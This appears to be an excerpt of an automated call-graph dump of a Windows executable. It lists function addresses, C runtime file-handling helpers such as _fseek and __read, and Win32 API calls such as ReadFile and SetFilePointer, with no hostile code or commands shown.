87069->87072 87070 414a69 87340 417f25 10 API calls __wsplitpath_helper 87070->87340 87323 4149d9 87072->87323 87074->86994 87408 414c76 87077->87408 87079 414d1c 87080 44afef 87079->87080 87576 442c5a 87080->87576 87082 44b00d 87082->86996 87084 414fee _fseek 87083->87084 87085 414ffa 87084->87085 87086 41500f 87084->87086 87580 417f77 46 API calls __getptd_noexit 87085->87580 87088 415471 __lock_file 47 API calls 87086->87088 87090 415017 87088->87090 87089 414fff 87581 417f25 10 API calls __wsplitpath_helper 87089->87581 87092 414e4e __ftell_nolock 51 API calls 87090->87092 87093 415024 87092->87093 87582 41503d LeaveCriticalSection LeaveCriticalSection _fprintf 87093->87582 87095 41500a _fseek 87095->86998 87097 414dd6 87096->87097 87098 414deb 87096->87098 87107 417f77 46 API calls __getptd_noexit 87097->87107 87098->87097 87099 414df2 87098->87099 87109 41b91b 79 API calls 12 library calls 87099->87109 87102 414ddb 87108 417f25 10 API calls __wsplitpath_helper 87102->87108 87103 414e18 87105 414de6 87103->87105 87110 418f98 77 API calls 5 library calls 87103->87110 87105->87050 87107->87102 87108->87105 87109->87103 87110->87105 87114 414910 _fseek 87111->87114 87112 414923 87167 417f77 46 API calls __getptd_noexit 87112->87167 87114->87112 87116 414951 87114->87116 87115 414928 87168 417f25 10 API calls __wsplitpath_helper 87115->87168 87130 41d4d1 87116->87130 87119 414956 87120 41496a 87119->87120 87121 41495d 87119->87121 87123 414992 87120->87123 87124 414972 87120->87124 87169 417f77 46 API calls __getptd_noexit 87121->87169 87147 41d218 87123->87147 87170 417f77 46 API calls __getptd_noexit 87124->87170 87127 414933 _fseek @_EH4_CallFilterFunc@8 87127->87054 87131 41d4dd _fseek 87130->87131 87132 4182cb __lock 46 API calls 87131->87132 87145 41d4eb 87132->87145 87133 41d560 87172 41d5fb 87133->87172 87134 41d567 87135 416b04 __malloc_crt 46 API calls 87134->87135 87137 41d56e 87135->87137 87137->87133 87139 41d57c InitializeCriticalSectionAndSpinCount 87137->87139 87138 41d5f0 _fseek 87138->87119 87140 41d59c 87139->87140 87141 41d5af EnterCriticalSection 87139->87141 87144 413748 _free 46 API calls 87140->87144 87141->87133 87142 418209 __mtinitlocknum 46 API calls 87142->87145 87144->87133 87145->87133 87145->87134 87145->87142 87175 4154b2 47 API calls __lock 87145->87175 87176 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87145->87176 87148 41d23a 87147->87148 87149 41d255 87148->87149 87160 41d26c __wopenfile 87148->87160 87181 417f77 46 API calls __getptd_noexit 87149->87181 87151 41d25a 87182 417f25 10 API calls __wsplitpath_helper 87151->87182 87153 41d47a 87186 417f77 46 API calls __getptd_noexit 87153->87186 87154 41d48c 87178 422bf9 87154->87178 87157 41d47f 87187 417f25 10 API calls __wsplitpath_helper 87157->87187 87159 41499d 87171 4149b8 LeaveCriticalSection LeaveCriticalSection _fprintf 87159->87171 87160->87153 87166 41d421 87160->87166 87183 41341f 58 API calls 2 library calls 87160->87183 87162 41d41a 87162->87166 87184 41341f 58 API calls 2 library calls 87162->87184 87164 41d439 87164->87166 87185 41341f 58 API calls 2 library calls 87164->87185 87166->87153 87166->87154 87167->87115 87168->87127 87169->87127 87170->87127 87171->87127 87177 4181f2 LeaveCriticalSection 87172->87177 87174 41d602 87174->87138 87175->87145 87176->87145 87177->87174 87188 422b35 87178->87188 87180 422c14 87180->87159 87181->87151 87182->87159 87183->87162 87184->87164 87185->87166 87186->87157 87187->87159 87190 422b41 _fseek 87188->87190 87189 422b54 87191 417f77 __wsplitpath_helper 46 API calls 87189->87191 87190->87189 87192 422b8a 87190->87192 87193 422b59 87191->87193 87194 422400 __tsopen_nolock 109 API calls 87192->87194 87195 417f25 __wsplitpath_helper 10 API calls 87193->87195 87196 422ba4 87194->87196 87198 422b63 _fseek 87195->87198 87197 422bcb __wsopen_helper LeaveCriticalSection 87196->87197 87197->87198 87198->87180 87201 4150dd _fseek 87199->87201 87200 4150e9 87230 417f77 46 API calls __getptd_noexit 87200->87230 87201->87200 87202 41510f 87201->87202 87212 415471 87202->87212 87204 4150ee 87231 417f25 10 API calls __wsplitpath_helper 87204->87231 87211 4150f9 _fseek 87211->87060 87213 415483 87212->87213 87214 4154a5 EnterCriticalSection 87212->87214 87213->87214 87215 41548b 87213->87215 87217 415117 87214->87217 87216 4182cb __lock 46 API calls 87215->87216 87216->87217 87218 415047 87217->87218 87219 415067 87218->87219 87220 415057 87218->87220 87225 415079 87219->87225 87233 414e4e 87219->87233 87288 417f77 46 API calls __getptd_noexit 87220->87288 87224 41505c 87232 415143 LeaveCriticalSection LeaveCriticalSection _fprintf 87224->87232 87250 41443c 87225->87250 87228 4150b9 87263 41e1f4 87228->87263 87230->87204 87231->87211 87232->87211 87234 414e61 87233->87234 87235 414e79 87233->87235 87289 417f77 46 API calls __getptd_noexit 87234->87289 87237 414139 __flswbuf 46 API calls 87235->87237 87239 414e80 87237->87239 87238 414e66 87290 417f25 10 API calls __wsplitpath_helper 87238->87290 87241 41e1f4 __write 51 API calls 87239->87241 87243 414e97 87241->87243 87242 414e71 87242->87225 87243->87242 87244 414f09 87243->87244 87246 414ec9 87243->87246 87291 417f77 46 API calls __getptd_noexit 87244->87291 87246->87242 87247 41e1f4 __write 51 API calls 87246->87247 87248 414f64 87247->87248 87248->87242 87249 41e1f4 __write 51 API calls 87248->87249 87249->87242 87251 414477 87250->87251 87252 414455 87250->87252 87256 414139 87251->87256 87252->87251 87253 414139 __flswbuf 46 API calls 87252->87253 87254 414470 87253->87254 87292 41b7b2 77 API calls 6 library calls 87254->87292 87257 414145 87256->87257 87258 41415a 87256->87258 87293 417f77 46 API calls __getptd_noexit 87257->87293 87258->87228 87260 41414a 87294 417f25 10 API calls __wsplitpath_helper 87260->87294 87262 414155 87262->87228 87264 41e200 _fseek 87263->87264 87265 41e223 87264->87265 87266 41e208 87264->87266 87267 41e22f 87265->87267 87272 41e269 87265->87272 87315 417f8a 46 API calls __getptd_noexit 87266->87315 87317 417f8a 46 API calls __getptd_noexit 87267->87317 87270 41e20d 87316 417f77 46 API calls __getptd_noexit 87270->87316 87271 41e234 87318 417f77 46 API calls __getptd_noexit 87271->87318 87295 41ae56 87272->87295 87276 41e23c 87319 417f25 10 API calls __wsplitpath_helper 87276->87319 87277 41e26f 87279 41e291 87277->87279 87280 41e27d 87277->87280 87320 417f77 46 API calls __getptd_noexit 87279->87320 87305 41e17f 87280->87305 87283 41e289 87322 41e2c0 LeaveCriticalSection __unlock_fhandle 87283->87322 87284 41e296 87321 417f8a 46 API calls __getptd_noexit 87284->87321 87285 41e215 _fseek 87285->87224 87288->87224 87289->87238 87290->87242 87291->87242 87292->87251 87293->87260 87294->87262 87296 41ae62 _fseek 87295->87296 87297 41aebc 87296->87297 87300 4182cb __lock 46 API calls 87296->87300 87298 41aec1 EnterCriticalSection 87297->87298 87299 41aede _fseek 87297->87299 87298->87299 87299->87277 87301 41ae8e 87300->87301 87302 41aeaa 87301->87302 87303 41ae97 InitializeCriticalSectionAndSpinCount 87301->87303 87304 41aeec ___lock_fhandle LeaveCriticalSection 87302->87304 87303->87302 87304->87297 87306 41aded __lseeki64_nolock 46 API calls 87305->87306 87307 41e18e 87306->87307 87308 41e1a4 SetFilePointer 87307->87308 87309 41e194 87307->87309 87311 41e1c3 87308->87311 87312 41e1bb GetLastError 87308->87312 87310 417f77 __wsplitpath_helper 46 API calls 87309->87310 87313 41e199 87310->87313 87311->87313 87314 417f9d __dosmaperr 46 API calls 87311->87314 87312->87311 87313->87283 87314->87313 87315->87270 87316->87285 87317->87271 87318->87276 87319->87285 87320->87284 87321->87283 87322->87285 87324 4149ea 87323->87324 87325 4149fe 87323->87325 87369 417f77 46 API calls __getptd_noexit 87324->87369 87327 4149fa 87325->87327 87328 41443c __flush 77 API calls 87325->87328 87341 414ab2 LeaveCriticalSection LeaveCriticalSection _fprintf 87327->87341 87330 414a0a 87328->87330 87329 4149ef 87370 417f25 10 API calls __wsplitpath_helper 87329->87370 87342 41d8c2 87330->87342 87334 414139 __flswbuf 46 API calls 87335 414a18 87334->87335 87346 41d7fe 87335->87346 87337 414a1e 87337->87327 87338 413748 _free 46 API calls 87337->87338 87338->87327 87339->87070 87340->87074 87341->87074 87343 414a12 87342->87343 87344 41d8d2 87342->87344 87343->87334 87344->87343 87345 413748 _free 46 API calls 87344->87345 87345->87343 87347 41d80a _fseek 87346->87347 87348 41d812 87347->87348 87351 41d82d 87347->87351 87386 417f8a 46 API calls __getptd_noexit 87348->87386 87349 41d839 87388 417f8a 46 API calls __getptd_noexit 87349->87388 87351->87349 87355 41d873 87351->87355 87353 41d817 87387 417f77 46 API calls __getptd_noexit 87353->87387 87354 41d83e 87389 417f77 46 API calls __getptd_noexit 87354->87389 87358 41ae56 ___lock_fhandle 48 API calls 87355->87358 87360 41d879 87358->87360 87359 41d846 87390 417f25 10 API calls __wsplitpath_helper 87359->87390 87362 41d893 87360->87362 87363 41d887 87360->87363 87391 417f77 46 API calls __getptd_noexit 87362->87391 87371 41d762 87363->87371 87366 41d81f _fseek 87366->87337 87367 41d88d 87392 41d8ba LeaveCriticalSection __unlock_fhandle 87367->87392 87369->87329 87370->87327 87393 41aded 87371->87393 87373 41d7c8 87406 41ad67 47 API calls 2 library calls 87373->87406 87375 41d772 87375->87373 87376 41d7a6 87375->87376 87379 41aded __lseeki64_nolock 46 API calls 87375->87379 87376->87373 87377 41aded __lseeki64_nolock 46 API calls 87376->87377 87380 41d7b2 CloseHandle 87377->87380 87378 41d7d0 87381 41d7f2 87378->87381 87407 417f9d 46 API calls 3 library calls 87378->87407 87382 41d79d 87379->87382 87380->87373 87384 41d7be GetLastError 87380->87384 87381->87367 87383 41aded __lseeki64_nolock 46 API calls 87382->87383 87383->87376 87384->87373 87386->87353 87387->87366 87388->87354 87389->87359 87390->87366 87391->87367 87392->87366 87394 41ae12 87393->87394 87395 41adfa 87393->87395 87398 417f8a __set_osfhnd 46 API calls 87394->87398 87399 41ae51 87394->87399 87396 417f8a __set_osfhnd 46 API calls 87395->87396 87397 41adff 87396->87397 87400 417f77 __wsplitpath_helper 46 API calls 87397->87400 87401 41ae23 87398->87401 87399->87375 87402 41ae07 87400->87402 87403 417f77 __wsplitpath_helper 46 API calls 87401->87403 87402->87375 87404 41ae2b 87403->87404 87405 417f25 __wsplitpath_helper 10 API calls 87404->87405 87405->87402 87406->87378 87407->87381 87409 414c82 _fseek 87408->87409 87410 414cc3 87409->87410 87411 414cbb _fseek 87409->87411 87412 414c96 __setmbcp_nolock 87409->87412 87413 415471 __lock_file 47 API calls 87410->87413 87411->87079 87435 417f77 46 API calls __getptd_noexit 87412->87435 87415 414ccb 87413->87415 87421 414aba 87415->87421 87417 414cb0 87436 417f25 10 API calls __wsplitpath_helper 87417->87436 87422 414af2 87421->87422 87426 414ad8 __setmbcp_nolock 87421->87426 87437 414cfa LeaveCriticalSection LeaveCriticalSection _fprintf 87422->87437 87423 414ae2 87488 417f77 46 API calls __getptd_noexit 87423->87488 87425 414b2d 87425->87422 87429 414c38 __setmbcp_nolock 87425->87429 87430 414139 __flswbuf 46 API calls 87425->87430 87438 41dfcc 87425->87438 87468 41d8f3 87425->87468 87490 41e0c2 46 API calls 3 library calls 87425->87490 87426->87422 87426->87423 87426->87425 87491 417f77 46 API calls __getptd_noexit 87429->87491 87430->87425 87434 414ae7 87489 417f25 10 API calls __wsplitpath_helper 87434->87489 87435->87417 87436->87411 87437->87411 87439 41dfd8 _fseek 87438->87439 87440 41dfe0 87439->87440 87441 41dffb 87439->87441 87561 417f8a 46 API calls __getptd_noexit 87440->87561 87443 41e007 87441->87443 87446 41e041 87441->87446 87563 417f8a 46 API calls __getptd_noexit 87443->87563 87444 41dfe5 87562 417f77 46 API calls __getptd_noexit 87444->87562 87449 41e063 87446->87449 87450 41e04e 87446->87450 87448 41e00c 87564 417f77 46 API calls __getptd_noexit 87448->87564 87453 41ae56 ___lock_fhandle 48 API calls 87449->87453 87566 417f8a 46 API calls __getptd_noexit 87450->87566 87456 41e069 87453->87456 87454 41e014 87565 417f25 10 API calls __wsplitpath_helper 87454->87565 87455 41e053 87567 417f77 46 API calls __getptd_noexit 87455->87567 87459 41e077 87456->87459 87460 41e08b 87456->87460 87458 41dfed _fseek 87458->87425 87492 41da15 87459->87492 87568 417f77 46 API calls __getptd_noexit 87460->87568 87464 41e083 87570 41e0ba LeaveCriticalSection __unlock_fhandle 87464->87570 87465 41e090 87569 417f8a 46 API calls __getptd_noexit 87465->87569 87469 41d900 87468->87469 87473 41d915 87468->87473 87574 417f77 46 API calls __getptd_noexit 87469->87574 87471 41d905 87575 417f25 10 API calls __wsplitpath_helper 87471->87575 87474 41d94a 87473->87474 87482 41d910 87473->87482 87571 420603 87473->87571 87476 414139 __flswbuf 46 API calls 87474->87476 87477 41d95e 87476->87477 87478 41dfcc __read 59 API calls 87477->87478 87479 41d965 87478->87479 87480 414139 __flswbuf 46 API calls 87479->87480 87479->87482 87481 41d988 87480->87481 87481->87482 87483 414139 __flswbuf 46 API calls 87481->87483 87482->87425 87484 41d994 87483->87484 87484->87482 87485 414139 __flswbuf 46 API calls 87484->87485 87486 41d9a1 87485->87486 87487 414139 __flswbuf 46 API calls 87486->87487 87487->87482 87488->87434 87489->87422 87490->87425 87491->87434 87493 41da31 87492->87493 87494 41da4c 87492->87494 87496 417f8a __set_osfhnd 46 API calls 87493->87496 87495 41da5b 87494->87495 87497 41da7a 87494->87497 87498 417f8a __set_osfhnd 46 API calls 87495->87498 87499 41da36 87496->87499 87501 41da98 87497->87501 87512 41daac 87497->87512 87500 41da60 87498->87500 87502 417f77 __wsplitpath_helper 46 API calls 87499->87502 87504 417f77 __wsplitpath_helper 46 API calls 87500->87504 87505 417f8a __set_osfhnd 46 API calls 87501->87505 87513 41da3e 87502->87513 87503 41db02 87507 417f8a __set_osfhnd 46 API calls 87503->87507 87506 41da67 87504->87506 87508 41da9d 87505->87508 87509 417f25 __wsplitpath_helper 10 API calls 87506->87509 87510 41db07 87507->87510 87511 417f77 __wsplitpath_helper 46 API calls 87508->87511 87509->87513 87514 417f77 __wsplitpath_helper 46 API calls 87510->87514 87515 41daa4 87511->87515 87512->87503 87512->87513 87516 41dae1 87512->87516 87518 41db1b 87512->87518 87513->87464 87514->87515 87517 417f25 __wsplitpath_helper 10 API calls 87515->87517 87516->87503 87521 41daec ReadFile 87516->87521 87517->87513 87520 416b04 __malloc_crt 46 API calls 87518->87520 87522 41db31 87520->87522 87523 41dc17 87521->87523 87524 41df8f GetLastError 87521->87524 87527 41db59 87522->87527 87528 41db3b 87522->87528 87523->87524 87531 41dc2b 87523->87531 87525 41de16 87524->87525 87526 41df9c 87524->87526 87535 417f9d __dosmaperr 46 API calls 87525->87535 87540 41dd9b 87525->87540 87529 417f77 __wsplitpath_helper 46 API calls 87526->87529 87532 420494 __lseeki64_nolock 48 API calls 87527->87532 87530 417f77 __wsplitpath_helper 46 API calls 87528->87530 87533 41dfa1 87529->87533 87534 41db40 87530->87534 87531->87540 87541 41dc47 87531->87541 87544 41de5b 87531->87544 87536 41db67 87532->87536 87537 417f8a __set_osfhnd 46 API calls 87533->87537 87538 417f8a __set_osfhnd 46 API calls 87534->87538 87535->87540 87536->87521 87537->87540 87538->87513 87539 413748 _free 46 API calls 87539->87513 87540->87513 87540->87539 87542 41dcab ReadFile 87541->87542 87549 41dd28 87541->87549 87547 41dcc9 GetLastError 87542->87547 87552 41dcd3 87542->87552 87543 41ded0 ReadFile 87545 41deef GetLastError 87543->87545 87553 41def9 87543->87553 87544->87540 87544->87543 87545->87544 87545->87553 87546 41ddec MultiByteToWideChar 87546->87540 87548 41de10 GetLastError 87546->87548 87547->87541 87547->87552 87548->87525 87549->87540 87550 41dda3 87549->87550 87551 41dd96 87549->87551 87557 41dd60 87549->87557 87550->87557 87558 41ddda 87550->87558 87554 417f77 __wsplitpath_helper 46 API calls 87551->87554 87552->87541 87555 420494 __lseeki64_nolock 48 API calls 87552->87555 87553->87544 87556 420494 __lseeki64_nolock 48 API calls 87553->87556 87554->87540 87555->87552 87556->87553 87557->87546 87559 420494 __lseeki64_nolock 48 API calls 87558->87559 87560 41dde9 87559->87560 87560->87546 87561->87444 87562->87458 87563->87448 87564->87454 87565->87458 87566->87455 87567->87454 87568->87465 87569->87464 87570->87458 87572 416b04 __malloc_crt 46 API calls 87571->87572 87573 420618 87572->87573 87573->87474 87574->87471 87575->87482 87579 4148b3 GetSystemTimeAsFileTime __aulldiv 87576->87579 87578 442c6b 87578->87082 87579->87578 87580->87089 87581->87095 87582->87095 87586 45272f __tzset_nolock _wcscpy 87583->87586 87584 44afef GetSystemTimeAsFileTime 87584->87586 87585 4528a4 87585->87004 87585->87005 87586->87584 87586->87585 87587 414d04 61 API calls __fread_nolock 87586->87587 87588 4150d1 81 API calls _fseek 87586->87588 87587->87586 87588->87586 87590 44b1bc 87589->87590 87591 44b1ca 87589->87591 87592 4149c2 116 API calls 87590->87592 87593 44b1e1 87591->87593 87594 4149c2 116 API calls 87591->87594 87595 44b1d8 87591->87595 87592->87591 87624 4321a4 87593->87624 87596 44b2db 87594->87596 87595->87032 87596->87593 87598 44b2e9 87596->87598 87600 44b2f6 87598->87600 87603 414a46 __fcloseall 82 API calls 87598->87603 87599 44b224 87601 44b253 87599->87601 87602 44b228 87599->87602 87600->87032 87628 43213d 87601->87628 87605 44b235 87602->87605 87608 414a46 __fcloseall 82 API calls 87602->87608 87603->87600 87606 44b245 87605->87606 87609 414a46 __fcloseall 82 API calls 87605->87609 87606->87032 87607 44b25a 87610 44b260 87607->87610 87611 44b289 87607->87611 87608->87605 87609->87606 87613 44b26d 87610->87613 87615 414a46 __fcloseall 82 API calls 87610->87615 87638 44b0bf 87 API calls 87611->87638 87616 44b27d 87613->87616 87618 414a46 __fcloseall 82 API calls 87613->87618 87614 44b28f 87639 4320f8 46 API calls _free 87614->87639 87615->87613 87616->87032 87618->87616 87619 44b295 87620 44b2a2 87619->87620 87621 414a46 __fcloseall 82 API calls 87619->87621 87622 44b2b2 87620->87622 87623 414a46 __fcloseall 82 API calls 87620->87623 87621->87620 87622->87032 87623->87622 87625 4321cb 87624->87625 87627 4321b4 __tzset_nolock _memmove 87624->87627 87626 414d04 __fread_nolock 61 API calls 87625->87626 87626->87627 87627->87599 87629 4135bb _malloc 46 API calls 87628->87629 87630 432150 87629->87630 87631 4135bb _malloc 46 API calls 87630->87631 87632 432162 87631->87632 87633 4135bb _malloc 46 API calls 87632->87633 87634 432174 87633->87634 87636 432189 87634->87636 87640 4320f8 46 API calls _free 87634->87640 87636->87607 87637 432198 87637->87607 87638->87614 87639->87619 87640->87637 87641->86935 87642->86937 87643->86954 87644->86954 87645->86954 87646->86949 87647->86954 87648->86954 87649->86960 87650->86969 87651->86968 87652->86968 87702 410160 87653->87702 87655 41012f GetFullPathNameW 87656 410147 moneypunct 87655->87656 87656->86790 87658 4102cb SHGetDesktopFolder 87657->87658 87661 410333 _wcsncpy 87657->87661 87659 4102e0 _wcsncpy 87658->87659 87658->87661 87660 41031c SHGetPathFromIDListW 87659->87660 87659->87661 87660->87661 87661->86792 87663 425f4a 87662->87663 87664 4101bb 87662->87664 87667 4114ab __wcsicoll 58 API calls 87663->87667 87670 425f6e 87663->87670 87665 410160 52 API calls 87664->87665 87666 4101c7 87665->87666 87706 410200 52 API calls 2 library calls 87666->87706 87667->87663 87669 4101d6 87707 410200 52 API calls 2 library calls 87669->87707 87670->86795 87672 4101e9 87672->86795 87674 40f760 128 API calls 87673->87674 87675 40f584 87674->87675 87676 429335 87675->87676 87677 40f58c 87675->87677 87680 4528bd 118 API calls 87676->87680 87678 40f598 87677->87678 87679 429358 87677->87679 87725 4033c0 113 API calls 7 library calls 87678->87725 87726 434034 86 API calls _wprintf 87679->87726 87682 42934b 87680->87682 87685 429373 87682->87685 87686 42934f 87682->87686 87684 40f5b4 87684->86793 87689 4115d7 52 API calls 87685->87689 87688 431e58 82 API calls 87686->87688 87687 429369 87687->87685 87688->87679 87701 4293c5 moneypunct 87689->87701 87690 42959c 87691 413748 _free 46 API calls 87690->87691 87692 4295a5 87691->87692 87693 431e58 82 API calls 87692->87693 87694 4295b1 87693->87694 87698 401b10 52 API calls 87698->87701 87701->87690 87701->87698 87708 444af8 87701->87708 87711 402780 87701->87711 87719 4022d0 87701->87719 87727 44c7dd 64 API calls 3 library calls 87701->87727 87728 44b41c 52 API calls 87701->87728 87703 410167 _wcslen 87702->87703 87704 4115d7 52 API calls 87703->87704 87705 41017e _wcscpy 87704->87705 87705->87655 87706->87669 87707->87672 87709 4115d7 52 API calls 87708->87709 87710 444b27 _memmove 87709->87710 87710->87701 87713 402827 87711->87713 87718 402790 moneypunct _memmove 87711->87718 87712 4115d7 52 API calls 87715 402797 87712->87715 87714 4115d7 52 API calls 87713->87714 87714->87718 87716 4115d7 52 API calls 87715->87716 87717 4027bd 87715->87717 87716->87717 87717->87701 87718->87712 87720 40239d 87719->87720 87721 4022e0 87719->87721 87720->87701 87721->87720 87722 4115d7 52 API calls 87721->87722 87723 402320 moneypunct 87721->87723 87722->87723 87723->87720 87724 4115d7 52 API calls 87723->87724 87724->87723 87725->87684 87726->87687 87727->87701 87728->87701 87730 402539 moneypunct 87729->87730 87731 402417 87729->87731 87730->86799 87731->87730 87732 4115d7 52 API calls 87731->87732 87733 402443 87732->87733 87734 4115d7 52 API calls 87733->87734 87735 4024b4 87734->87735 87735->87730 87737 4022d0 52 API calls 87735->87737 87758 402880 95 API calls 2 library calls 87735->87758 87737->87735 87742 401566 87738->87742 87739 401794 87759 40e9a0 90 API calls 87739->87759 87742->87739 87743 4010a0 52 API calls 87742->87743 87744 40167a 87742->87744 87743->87742 87745 4017c0 87744->87745 87760 45e737 90 API calls 3 library calls 87744->87760 87745->86801 87747 40bc70 52 API calls 87746->87747 87748 40d451 87747->87748 87749 40d50f 87748->87749 87751 40e0a0 52 API calls 87748->87751 87752 427c01 87748->87752 87754 401b10 52 API calls 87748->87754 87755 40d519 87748->87755 87761 40f310 53 API calls 87748->87761 87762 40d860 91 API calls 87748->87762 87763 410600 52 API calls 87749->87763 87751->87748 87764 45e737 90 API calls 3 library calls 87752->87764 87754->87748 87755->86804 87758->87735 87759->87744 87760->87745 87761->87748 87762->87748 87763->87755 87764->87755 87765->86817 87766->86818 87768 42c5fe 87767->87768 87782 4091c6 87767->87782 87769 40bc70 52 API calls 87768->87769 87768->87782 87770 42c64e InterlockedIncrement 87769->87770 87771 42c665 87770->87771 87775 42c697 87770->87775 87773 42c672 InterlockedDecrement Sleep InterlockedIncrement 87771->87773 87771->87775 87772 42c737 InterlockedDecrement 87774 42c74a 87772->87774 87773->87771 87773->87775 87776 408f40 VariantClear 87774->87776 87775->87772 87797 42c731 87775->87797 88060 408e80 87775->88060 87778 42c752 87776->87778 88069 410c60 VariantClear moneypunct 87778->88069 87782->86865 87783 42c6db 87784 402160 52 API calls 87783->87784 87785 42c6e5 87784->87785 88065 45340c 85 API calls 87785->88065 87787 42c6f1 88066 40d200 52 API calls 2 library calls 87787->88066 87789 42c6fb 88067 465124 53 API calls 87789->88067 87791 42c715 87792 42c76a 87791->87792 87793 42c719 87791->87793 87794 401b10 52 API calls 87792->87794 88068 46fe32 VariantClear 87793->88068 87796 42c77e 87794->87796 87798 401980 53 API calls 87796->87798 87797->87772 87803 42c796 87798->87803 87799 42c812 88071 46fe32 VariantClear 87799->88071 87801 42c82a InterlockedDecrement 88072 46ff07 54 API calls 87801->88072 87803->87799 87804 42c864 87803->87804 88070 40ba10 52 API calls 2 library calls 87803->88070 88073 45e737 90 API calls 3 library calls 87804->88073 87806 42c9ec 88116 47d33e 331 API calls 87806->88116 87809 42c9fe 88117 46feb1 VariantClear VariantClear 87809->88117 87811 408f40 VariantClear 87821 42c849 87811->87821 87812 42ca08 87814 401b10 52 API calls 87812->87814 87813 408f40 VariantClear 87816 42c891 87813->87816 87815 42ca15 87814->87815 87817 40c2c0 52 API calls 87815->87817 88074 410c60 VariantClear moneypunct 87816->88074 87822 42c874 87817->87822 87819 401980 53 API calls 87819->87821 87820 402780 52 API calls 87820->87821 87821->87806 87821->87811 87821->87819 87821->87820 88075 40a780 87821->88075 87822->87813 87824 42ca59 87822->87824 87824->87824 87826 40afc4 87825->87826 87827 40b156 87825->87827 87828 40afd5 87826->87828 87829 42d1e3 87826->87829 88127 45e737 90 API calls 3 library calls 87827->88127 87834 40a780 194 API calls 87828->87834 87846 40b11a moneypunct 87828->87846 88128 45e737 90 API calls 3 library calls 87829->88128 87832 42d1f8 87839 408f40 VariantClear 87832->87839 87833 40b143 87833->86865 87836 40b00a 87834->87836 87836->87832 87838 40b012 87836->87838 87837 42d4db 87837->87837 87840 40b04a 87838->87840 87843 42d231 VariantClear 87838->87843 87850 40b094 moneypunct 87838->87850 87839->87833 87848 40b05c moneypunct 87840->87848 88129 40e270 VariantClear moneypunct 87840->88129 87841 42d425 moneypunct 87844 42d45a VariantClear 87841->87844 87841->87846 87842 40b108 87842->87846 88130 40e270 VariantClear moneypunct 87842->88130 87843->87848 87844->87846 87846->87833 88131 45e737 90 API calls 3 library calls 87846->88131 87847 4115d7 52 API calls 87847->87850 87848->87847 87848->87850 87850->87841 87850->87842 87852 40900d 87851->87852 87853 408fff 87851->87853 87856 42c3f6 87852->87856 87858 40a780 194 API calls 87852->87858 87859 42c44a 87852->87859 87862 42c47b 87852->87862 87863 42c4cb 87852->87863 87864 42c564 87852->87864 87867 42c548 87852->87867 87871 409112 87852->87871 87873 42c528 87852->87873 87875 4090df 87852->87875 87876 4090ea 87852->87876 87885 4090f2 moneypunct 87852->87885 88134 4534e3 52 API calls 87852->88134 88136 40c4e0 194 API calls 87852->88136 88132 403ea0 52 API calls __cinit 87853->88132 88135 45e737 90 API calls 3 library calls 87856->88135 87858->87852 88137 45e737 90 API calls 3 library calls 87859->88137 88138 451b42 61 API calls 87862->88138 88140 47faae 233 API calls 87863->88140 87868 408f40 VariantClear 87864->87868 88143 45e737 90 API calls 3 library calls 87867->88143 87868->87885 87869 42c491 87869->87885 88139 45e737 90 API calls 3 library calls 87869->88139 87870 42c4da 87870->87885 88141 45e737 90 API calls 3 library calls 87870->88141 87871->87867 87878 40912b 87871->87878 88142 45e737 90 API calls 3 library calls 87873->88142 87875->87876 87880 408e80 VariantClear 87875->87880 87881 408f40 VariantClear 87876->87881 87878->87885 88133 403e10 53 API calls 87878->88133 87880->87876 87881->87885 87883 40914b 87884 408f40 VariantClear 87883->87884 87884->87885 87885->86865 88144 408d90 87886->88144 87888 429778 88171 410c60 VariantClear moneypunct 87888->88171 87890 429780 87891 408cf9 87891->87888 87892 42976c 87891->87892 87894 408d2d 87891->87894 88170 45e737 90 API calls 3 library calls 87892->88170 88160 403d10 87894->88160 87897 408d71 moneypunct 87897->86865 87898 408f40 VariantClear 87899 408d45 moneypunct 87898->87899 87899->87897 87899->87898 87901 425c87 87900->87901 87902 40d15f 87900->87902 87903 425cc7 87901->87903 87904 425ca1 TranslateAcceleratorW 87901->87904 87902->86865 87904->87902 87906 42602f 87905->87906 87907 40d17f 87905->87907 87906->86865 87908 40d18c 87907->87908 87909 42608e IsDialogMessageW 87907->87909 88445 430c46 GetClassLongW 87907->88445 87908->86865 87909->87907 87909->87908 87912 4096c6 _wcslen 87911->87912 87913 4115d7 52 API calls 87912->87913 87974 40a70c moneypunct _memmove 87912->87974 87914 4096fa _memmove 87913->87914 87915 4115d7 52 API calls 87914->87915 87918 40971b 87915->87918 87916 4013a0 52 API calls 87917 4297aa 87916->87917 87919 4115d7 52 API calls 87917->87919 87920 409749 CharUpperBuffW 87918->87920 87922 40976a moneypunct 87918->87922 87918->87974 87962 4297d1 _memmove 87919->87962 87920->87922 87970 4097e5 moneypunct 87922->87970 88447 47dcbb 196 API calls 87922->88447 87924 408f40 VariantClear 87925 42ae92 87924->87925 88474 410c60 VariantClear moneypunct 87925->88474 87927 42aea4 87928 409aa2 87930 4115d7 52 API calls 87928->87930 87934 409afe 87928->87934 87928->87962 87929 40a689 87931 4115d7 52 API calls 87929->87931 87930->87934 87953 40a6af moneypunct _memmove 87931->87953 87932 409b2a 87936 429dbe 87932->87936 88002 409b4d moneypunct _memmove 87932->88002 88455 40b400 VariantClear VariantClear moneypunct 87932->88455 87933 40c2c0 52 API calls 87933->87970 87934->87932 87935 4115d7 52 API calls 87934->87935 87937 429d31 87935->87937 87941 429dd3 87936->87941 88456 40b400 VariantClear VariantClear moneypunct 87936->88456 87940 429d42 87937->87940 88452 44a801 52 API calls 87937->88452 87938 409fd2 87944 40a045 87938->87944 87999 42a3f5 87938->87999 87951 40e0a0 52 API calls 87940->87951 87941->88002 88457 40e1c0 VariantClear moneypunct 87941->88457 87942 429a46 VariantClear 87942->87970 87948 4115d7 52 API calls 87944->87948 87945 408f40 VariantClear 87945->87970 87955 40a04c 87948->87955 87950 4115d7 52 API calls 87950->87970 87956 429d57 87951->87956 87954 4115d7 52 API calls 87953->87954 87954->87974 87960 40a0a7 87955->87960 87964 4091e0 317 API calls 87955->87964 88453 453443 52 API calls 87956->88453 87958 42a42f 88461 45e737 90 API calls 3 library calls 87958->88461 87983 40a0af 87960->87983 88462 40c790 VariantClear moneypunct 87960->88462 87961 4299d9 87965 408f40 VariantClear 87961->87965 88473 45e737 90 API calls 3 library calls 87962->88473 87964->87960 87969 4299e2 87965->87969 87966 429abd 87966->86865 87967 429d88 88454 453443 52 API calls 87967->88454 88449 410c60 VariantClear moneypunct 87969->88449 87970->87928 87970->87929 87970->87933 87970->87942 87970->87945 87970->87950 87970->87953 87970->87961 87970->87962 87970->87966 87976 40a780 194 API calls 87970->87976 87978 42a452 87970->87978 88448 40c4e0 194 